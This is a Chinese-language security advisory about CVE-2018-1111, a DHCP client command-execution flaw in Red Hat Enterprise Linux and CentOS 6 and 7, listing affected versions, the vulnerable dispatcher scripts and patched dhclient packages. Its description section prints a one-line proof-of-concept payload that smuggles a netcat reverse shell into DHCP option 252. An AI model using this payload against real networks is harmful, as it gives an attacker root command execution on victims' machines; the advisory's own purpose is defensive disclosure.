关于RedHat DHCP客户端命令执行漏洞的公告
2018年5月16日,华北1安全应急响应中心监控到红帽官方发布了安全更新,修复了编号为CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。目前相关利用代码已经公开,可用于本地网络攻击。
漏洞名称
Red Hat DHCP客户端命令执行漏洞预警
漏洞危害等级
严重
影响版本
Red Hat Enterprise Linux Server 6
Red Hat Enterprise Linux Server 7
CentOS 6
CentOS 7
漏洞描述
CVE-2018-1111的远程代码执行漏洞,攻击者可以通过伪造DHCP服务器发送响应包,攻击红帽系统,获取root权限并执行任意命令。DHCP 是一个局域网的网络协议,主要用于内部网络动态IP地址分配。
RedHat提供的DHCP客户端软件包dhclient的脚本为:
/etc/NetworkManager/dispatcher.d/11-dhclient(RedHat Enterprise Linux 7)
/etc/NetworkManager/dispatcher.d/10-dhclient(RedHat Enterprise Linux 6)
当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。
使用单引号使参数值逃逸成功,导致了命令执行
--dhcp-option="252,x'&nc -e /bin/bas 10.1.1.1 1337 #
漏洞编号
CVE-2018-1111
修复方案
受影响产品的更新
具体产品
更新软件包
更新链接
Red Hat Enterprise Linux 7(z-stream)
dhclient
Red Hat Enterprise Linux 7.4 Extended Update Support *
dhclient
Red Hat Enterprise Linux 7.3 Extended Update Support *
dhclient
Red Hat Enterprise Linux 7.2 Advanced Update Support, Telco Extended Update Support, and Update Services for SAP Solutions ,*,**
dhclient
Red Hat Enterprise Linux 6 (z-stream)
dhclient
Red Hat Enterprise Linux 6.7 Extended Update Support *
dhclient
Red Hat Enterprise Linux 6.6 Advanced Update Support and Telco Extended Update Support ,*
dhclient
Red Hat Enterprise Linux 6.5 Advanced Update Support **
dhclient
Red Hat Enterprise Linux 6.4 Advanced Update Support **
dhclient
相关链接
https://access.redhat.com/errata/RHSA-2018:1458
https://cert.360.cn/warning/detail?id=f075706d5a3c7efbb56efeead3d68a72
北京华北1网络技术有限公司
2018/05/16